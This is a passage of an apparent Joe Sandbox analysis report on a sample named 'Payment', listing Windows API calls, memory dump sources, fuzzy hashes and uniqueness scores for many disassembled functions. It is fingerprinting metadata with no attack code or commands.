                                                          • Associated: 00000000.00000002.2156244856.0000000000B98000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_ad0000_Payment.jbxd
                                                          Similarity
                                                          • API ID: PrivateProfile$SectionWrite$String$__itow__swprintf
                                                          • String ID:
                                                          • API String ID: 1389676194-0
                                                          • Opcode ID: 49dc7efca35396b7b189212187ee26f9aca7cfb75d5635da02bc5f3cd5e5f7fd
                                                          • Instruction ID: 4700900d6ec98030fa054fe85f4372a4092efbad6b04b3512a23b96e0142fa8d
                                                          • Opcode Fuzzy Hash: 49dc7efca35396b7b189212187ee26f9aca7cfb75d5635da02bc5f3cd5e5f7fd
                                                          • Instruction Fuzzy Hash: 0E510E35A00215EFCB05EF64C991AAEBBF5EF08310F148099F94AAB361CB31ED51DB50
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2155972236.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                          • Associated: 00000000.00000002.2155945406.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156203257.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156244856.0000000000B98000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_ad0000_Payment.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 1b641529e9586a7e149ae61a5ca7046a805fa2e46c8c3f57f72ff928317eecf1
                                                          • Instruction ID: da4bb7a03e37ecda2b2d55ef2d8032072c1cefa988fcc01f4733c51c5ea3440c
                                                          • Opcode Fuzzy Hash: 1b641529e9586a7e149ae61a5ca7046a805fa2e46c8c3f57f72ff928317eecf1
                                                          • Instruction Fuzzy Hash: 0341E035900204ABD720DB68DC88FA9BBE8EB09312F1402E5FC55B72E0DB70AE49CA55
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • GetCursorPos.USER32(?), ref: 00AD2357
                                                          • ScreenToClient.USER32(00B967B0,?), ref: 00AD2374
                                                          • GetAsyncKeyState.USER32(00000001), ref: 00AD2399
                                                          • GetAsyncKeyState.USER32(00000002), ref: 00AD23A7
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2155972236.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                          • Associated: 00000000.00000002.2155945406.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156203257.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156244856.0000000000B98000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_ad0000_Payment.jbxd
                                                          Similarity
                                                          • API ID: AsyncState$ClientCursorScreen
                                                          • String ID:
                                                          • API String ID: 4210589936-0
                                                          • Opcode ID: 2a3dc4134aab41b23a0221f9294462b1bc80bdae53612590ee80305bb3582619
                                                          • Instruction ID: 478b6d30a67636c7be41e5e61f068bf8959b5853e1194f850a943ac1b871f7c1
                                                          • Opcode Fuzzy Hash: 2a3dc4134aab41b23a0221f9294462b1bc80bdae53612590ee80305bb3582619
                                                          • Instruction Fuzzy Hash: E7417C35504219FBDF159F68C844BE9BFB4FB15360F20439AF829A62A0C734AD94DB91
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00B2695D
                                                          • TranslateAcceleratorW.USER32(?,?,?), ref: 00B269A9
                                                          • TranslateMessage.USER32(?), ref: 00B269D2
                                                          • DispatchMessageW.USER32(?), ref: 00B269DC
                                                          • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00B269EB
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2155972236.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                          • Associated: 00000000.00000002.2155945406.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156203257.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156244856.0000000000B98000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_ad0000_Payment.jbxd
                                                          Similarity
                                                          • API ID: Message$PeekTranslate$AcceleratorDispatch
                                                          • String ID:
                                                          • API String ID: 2108273632-0
                                                          • Opcode ID: 45b2ddcc06ea8864bdc736391a518b82e4ed34b512b30bbf49a8fc811a317618
                                                          • Instruction ID: 4d1fade28f0de5c70dd0aad61c6706101f9a85eac2163c21e9081e0709e04af4
                                                          • Opcode Fuzzy Hash: 45b2ddcc06ea8864bdc736391a518b82e4ed34b512b30bbf49a8fc811a317618
                                                          • Instruction Fuzzy Hash: 87318371900266AADB20CF74AC84BB6BBECEB1A304F1441E6E429D31A1DF75D8C5D7A0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • GetWindowRect.USER32(?,?), ref: 00B28F12
                                                          • PostMessageW.USER32(?,00000201,00000001), ref: 00B28FBC
                                                          • Sleep.KERNEL32(00000000,?,00000201,00000001,?,?,?), ref: 00B28FC4
                                                          • PostMessageW.USER32(?,00000202,00000000), ref: 00B28FD2
                                                          • Sleep.KERNEL32(00000000,?,00000202,00000000,?,?,00000201,00000001,?,?,?), ref: 00B28FDA
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2155972236.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                          • Associated: 00000000.00000002.2155945406.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156203257.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156244856.0000000000B98000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_ad0000_Payment.jbxd
                                                          Similarity
                                                          • API ID: MessagePostSleep$RectWindow
                                                          • String ID:
                                                          • API String ID: 3382505437-0
                                                          • Opcode ID: 5fdc8fcf5288aefb12bb400e41cc7cb419d5e82d5bbefe189f8ccd8c5d9f7c41
                                                          • Instruction ID: b9cf33d7e8bd126e80365edf96956abc3ccd672e00ba8e49001aaeee2f590e21
                                                          • Opcode Fuzzy Hash: 5fdc8fcf5288aefb12bb400e41cc7cb419d5e82d5bbefe189f8ccd8c5d9f7c41
                                                          • Instruction Fuzzy Hash: DA31C771501219EFDF14CF68EA4CAAE7BB6EB04315F104665F929E71D0C7709914DB50
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • IsWindowVisible.USER32(?), ref: 00B2B6C7
                                                          • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 00B2B6E4
                                                          • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 00B2B71C
                                                          • CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 00B2B742
                                                          • _wcsstr.LIBCMT ref: 00B2B74C
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2155972236.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                          • Associated: 00000000.00000002.2155945406.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156203257.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156244856.0000000000B98000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_ad0000_Payment.jbxd
                                                          Similarity
                                                          • API ID: MessageSend$BuffCharUpperVisibleWindow_wcsstr
                                                          • String ID:
                                                          • API String ID: 3902887630-0
                                                          • Opcode ID: 54f9cdf318318dd8a3c78d24155c00d83d351e1d4cd7539b01477717900ef739
                                                          • Instruction ID: 775f5ccfa6e0549054d3a541a03e9f6b3bd1fb42d218a1b987ebebdfa2207df7
                                                          • Opcode Fuzzy Hash: 54f9cdf318318dd8a3c78d24155c00d83d351e1d4cd7539b01477717900ef739
                                                          • Instruction Fuzzy Hash: 3F210732204215BAEB255B79AD49E7BBBE8DF49710F0040B9F909CA1A1EF61DC40D260
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                            • Part of subcall function 00AD2612: GetWindowLongW.USER32(?,000000EB), ref: 00AD2623
                                                          • GetWindowLongW.USER32(?,000000F0), ref: 00B5B44C
                                                          • SetWindowLongW.USER32(00000000,000000F0,00000001), ref: 00B5B471
                                                          • SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 00B5B489
                                                          • GetSystemMetrics.USER32(00000004), ref: 00B5B4B2
                                                          • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000047,?,?,?,?,?,?,?,00B41184,00000000), ref: 00B5B4D0
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2155972236.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                          • Associated: 00000000.00000002.2155945406.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156203257.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156244856.0000000000B98000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_ad0000_Payment.jbxd
                                                          Similarity
                                                          • API ID: Window$Long$MetricsSystem
                                                          • String ID:
                                                          • API String ID: 2294984445-0
                                                          • Opcode ID: 5cf80bc629cc71a7f8794578fd82da1a1227118b0fe133657c8efbb61a5306ba
                                                          • Instruction ID: acda3cfa48800fac44b716d784f2f3fecc7968434bb9a223817c75a8ef7fe9da
                                                          • Opcode Fuzzy Hash: 5cf80bc629cc71a7f8794578fd82da1a1227118b0fe133657c8efbb61a5306ba
                                                          • Instruction Fuzzy Hash: 57217E31510216AFDB209F389C84F6A77A4EB05722F1146B9ED26C72E1EB309814DB80
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00B29802
                                                            • Part of subcall function 00AD7D2C: _memmove.LIBCMT ref: 00AD7D66
                                                          • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00B29834
                                                          • __itow.LIBCMT ref: 00B2984C
                                                          • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00B29874
                                                          • __itow.LIBCMT ref: 00B29885
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2155972236.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                          • Associated: 00000000.00000002.2155945406.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156203257.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156244856.0000000000B98000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_ad0000_Payment.jbxd
                                                          Similarity
                                                          • API ID: MessageSend$__itow$_memmove
                                                          • String ID:
                                                          • API String ID: 2983881199-0
                                                          • Opcode ID: 38a0a7f0b3c3bd29898ae9c4a8513a1d4b31ea545fe7b68e1dcc863ebe5a526a
                                                          • Instruction ID: cd37842d68a85cbb826dfbc51da5a5a12ee638628ea238312b979e2c82319745
                                                          • Opcode Fuzzy Hash: 38a0a7f0b3c3bd29898ae9c4a8513a1d4b31ea545fe7b68e1dcc863ebe5a526a
                                                          • Instruction Fuzzy Hash: 2321C571B00218ABDB10AA659C86EFE7BE9EF4A750F0800A5FD0DDF251EA709D45C791
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00AD134D
                                                          • SelectObject.GDI32(?,00000000), ref: 00AD135C
                                                          • BeginPath.GDI32(?), ref: 00AD1373
                                                          • SelectObject.GDI32(?,00000000), ref: 00AD139C
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2155972236.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                          • Associated: 00000000.00000002.2155945406.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156203257.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156244856.0000000000B98000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_ad0000_Payment.jbxd
                                                          Similarity
                                                          • API ID: ObjectSelect$BeginCreatePath
                                                          • String ID:
                                                          • API String ID: 3225163088-0
                                                          • Opcode ID: 2b19e3af8e6436854d6429c71aea424302c96151d89045e57a2e23b1cc13cd21
                                                          • Instruction ID: 15ac9c17b237aee11f60b5211dd6df23888802e8ab057d7db615712ea4489300
                                                          • Opcode Fuzzy Hash: 2b19e3af8e6436854d6429c71aea424302c96151d89045e57a2e23b1cc13cd21
                                                          • Instruction Fuzzy Hash: 5F215070800309EFDB119F25DE487A97BF9FB10362F188267F8119B2B0DB719991DB90
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2155972236.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                          • Associated: 00000000.00000002.2155945406.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156203257.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156244856.0000000000B98000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_ad0000_Payment.jbxd
                                                          Similarity
                                                          • API ID: _memcmp
                                                          • String ID:
                                                          • API String ID: 2931989736-0
                                                          • Opcode ID: 79c7f0cdd9002ccf6ece160bc259dc62f035beeab322b5e92e2fe74c361017a7
                                                          • Instruction ID: fa35c2668a2e85b0561bc6b8d7c6026914b3c9441a8d13f872efd0b1dd1e4473
                                                          • Opcode Fuzzy Hash: 79c7f0cdd9002ccf6ece160bc259dc62f035beeab322b5e92e2fe74c361017a7
                                                          • Instruction Fuzzy Hash: E701B9716045297BF204A6206D43F7F7BDCDF21399F044161FE08E6293E765DE2282E4
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • GetCurrentThreadId.KERNEL32 ref: 00B34D5C
                                                          • __beginthreadex.LIBCMT ref: 00B34D7A
                                                          • MessageBoxW.USER32(?,?,?,?), ref: 00B34D8F
                                                          • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 00B34DA5
                                                          • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00B34DAC
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2155972236.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                          • Associated: 00000000.00000002.2155945406.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156203257.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156244856.0000000000B98000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_ad0000_Payment.jbxd
                                                          Similarity
                                                          • API ID: CloseCurrentHandleMessageObjectSingleThreadWait__beginthreadex
                                                          • String ID:
                                                          • API String ID: 3824534824-0
                                                          • Opcode ID: 8c122944f3a4b69ebf39bdaf826a5342e1dac1d00981a7510c66da41805a6eec
                                                          • Instruction ID: 44427068c4ebae1db42a234f5224eda64c363f7eced0f9b060078cd7957d1edb
                                                          • Opcode Fuzzy Hash: 8c122944f3a4b69ebf39bdaf826a5342e1dac1d00981a7510c66da41805a6eec
                                                          • Instruction Fuzzy Hash: A2110872904209BBC7119BB89C04AAB7FECEB45321F2442AAF914D3260DB759D0087A0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00B28766
                                                          • GetLastError.KERNEL32(?,00B2822A,?,?,?), ref: 00B28770
                                                          • GetProcessHeap.KERNEL32(00000008,?,?,00B2822A,?,?,?), ref: 00B2877F
                                                          • HeapAlloc.KERNEL32(00000000,?,00B2822A,?,?,?), ref: 00B28786
                                                          • GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00B2879D
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2155972236.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                          • Associated: 00000000.00000002.2155945406.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156203257.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156244856.0000000000B98000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_ad0000_Payment.jbxd
                                                          Similarity
                                                          • API ID: HeapObjectSecurityUser$AllocErrorLastProcess
                                                          • String ID:
                                                          • API String ID: 842720411-0
                                                          • Opcode ID: 7ef76664aa2ab0b44978ff6167c2514b5964ad5fd28bda45b7db95f8e8a2599c
                                                          • Instruction ID: 8b2fd2b7addeb6393c716caaa216d85d409c9c7748eeb406a2bda7d85401b73d
                                                          • Opcode Fuzzy Hash: 7ef76664aa2ab0b44978ff6167c2514b5964ad5fd28bda45b7db95f8e8a2599c
                                                          • Instruction Fuzzy Hash: 84014F71601215EFDB104FA5EC48DABBBACEF8535672004A9F949C3160DE718C10CA60
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • QueryPerformanceCounter.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00B35502
                                                          • QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 00B35510
                                                          • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?), ref: 00B35518
                                                          • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 00B35522
                                                          • Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00B3555E
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2155972236.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                          • Associated: 00000000.00000002.2155945406.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156203257.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156244856.0000000000B98000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_ad0000_Payment.jbxd
                                                          Similarity
                                                          • API ID: PerformanceQuery$CounterSleep$Frequency
                                                          • String ID:
                                                          • API String ID: 2833360925-0
                                                          • Opcode ID: b413016003b632314c29793f2de5184de9d7646738e1a3c1d7a7ca9bf3549b05
                                                          • Instruction ID: 521495f7118b779155adbbb3c28985d720a52a455ecda6190c8be8ce27713071
                                                          • Opcode Fuzzy Hash: b413016003b632314c29793f2de5184de9d7646738e1a3c1d7a7ca9bf3549b05
                                                          • Instruction Fuzzy Hash: 1D010C35D11A19DBCF10ABE4E8886EDFBB9FB19712F110496E501B2140DB31955487A1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • CLSIDFromProgID.OLE32(?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00B2758C,80070057,?,?,?,00B2799D), ref: 00B2766F
                                                          • ProgIDFromCLSID.OLE32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00B2758C,80070057,?,?), ref: 00B2768A
                                                          • lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00B2758C,80070057,?,?), ref: 00B27698
                                                          • CoTaskMemFree.OLE32(00000000,?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00B2758C,80070057,?), ref: 00B276A8
                                                          • CLSIDFromString.OLE32(?,?,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00B2758C,80070057,?,?), ref: 00B276B4
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2155972236.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                          • Associated: 00000000.00000002.2155945406.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156203257.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156244856.0000000000B98000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_ad0000_Payment.jbxd
                                                          Similarity
                                                          • API ID: From$Prog$FreeStringTasklstrcmpi
                                                          • String ID:
                                                          • API String ID: 3897988419-0
                                                          • Opcode ID: 1c500d42c57fbea4bbe2aca385a4f9152b11d22469088f5fd64eade8f3030a9e
                                                          • Instruction ID: 2055c54cf52533c27ec11492934f3b7281b57d197113a9af876f42c5dba48028
                                                          • Opcode Fuzzy Hash: 1c500d42c57fbea4bbe2aca385a4f9152b11d22469088f5fd64eade8f3030a9e
                                                          • Instruction Fuzzy Hash: 1401B172601725ABDB119F58EC44BAABBEDEB48752F1040A8FD08D3211EF31DD0187A4
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00B28608
                                                          • GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00B28612
                                                          • GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00B28621
                                                          • HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00B28628
                                                          • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00B2863E
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2155972236.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                          • Associated: 00000000.00000002.2155945406.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156203257.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156244856.0000000000B98000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_ad0000_Payment.jbxd
                                                          Similarity
                                                          • API ID: HeapInformationToken$AllocErrorLastProcess
                                                          • String ID:
                                                          • API String ID: 44706859-0
                                                          • Opcode ID: 4935675dab7ea879be935cfcc65af1c8f79c6dca6d29f455eb77dc98fa7e03ae
                                                          • Instruction ID: 7ed0a1c8731d81e028af7495bc1bf67a2a39429360f50365ba63c15aa6acc910
                                                          • Opcode Fuzzy Hash: 4935675dab7ea879be935cfcc65af1c8f79c6dca6d29f455eb77dc98fa7e03ae
                                                          • Instruction Fuzzy Hash: 72F08C34202316AFEB210FA4EC8DF7B7BACEF89755B0400A5F90983190CEA09C41DA60
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00B28669
                                                          • GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00B28673
                                                          • GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00B28682
                                                          • HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00B28689
                                                          • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00B2869F
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2155972236.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                          • Associated: 00000000.00000002.2155945406.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156203257.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156244856.0000000000B98000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_ad0000_Payment.jbxd
                                                          Similarity
                                                          • API ID: HeapInformationToken$AllocErrorLastProcess
                                                          • String ID:
                                                          • API String ID: 44706859-0
                                                          • Opcode ID: 1849e8c1f12324ca5510f4976d3c498c25a41479786129a10e256f460b4ea90f
                                                          • Instruction ID: 52bd12ed66e0b2af72012db1705a227a0c70cfeb266e06426db195ca0dfd6ead
                                                          • Opcode Fuzzy Hash: 1849e8c1f12324ca5510f4976d3c498c25a41479786129a10e256f460b4ea90f
                                                          • Instruction Fuzzy Hash: 32F0AF70202315AFEB121FA4EC88FBB7BADEF89756B1400A5F909C3190CEA09801DA60
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • GetDlgItem.USER32(?,000003E9), ref: 00B2C6BA
